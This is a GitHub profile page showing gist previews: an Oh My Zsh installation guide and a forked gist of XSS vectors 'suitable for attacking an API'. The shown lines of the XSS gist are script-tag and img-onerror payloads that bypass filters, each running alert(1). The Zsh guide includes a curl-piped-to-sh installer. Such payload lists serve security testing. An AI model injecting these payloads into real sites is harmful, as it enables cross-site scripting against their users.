Skip to content

Instantly share code, notes, and snippets.

View nylar357's full-sized avatar
💻
Faͣn ᴛⷮhͪeͤ flaͣmͫeͤs͛ oͦf dͩiͥs͛cͨoͦnᴛⷮeͤnᴛⷮ

CͨoͦNᴛⷮRͬAͣ nylar357

💻
Faͣn ᴛⷮhͪeͤ flaͣmͫeͤs͛ oͦf dͩiͥs͛cͨoͦnᴛⷮeͤnᴛⷮ
View GitHub Profile

Oh my zsh.

Oh My Zsh

Install ZSH.

sudo apt install zsh-autosuggestions zsh-syntax-highlighting zsh

Install Oh my ZSH.

@nylar357
nylar357 / 666_lines_of_XSS_vectors.html
Created November 25, 2019 16:14 — forked from dogrocker/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

Oh my zsh.

Install with curl

sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"

Enabling Plugins (zsh-autosuggestions & zsh-syntax-highlighting)

  • Download zsh-autosuggestions by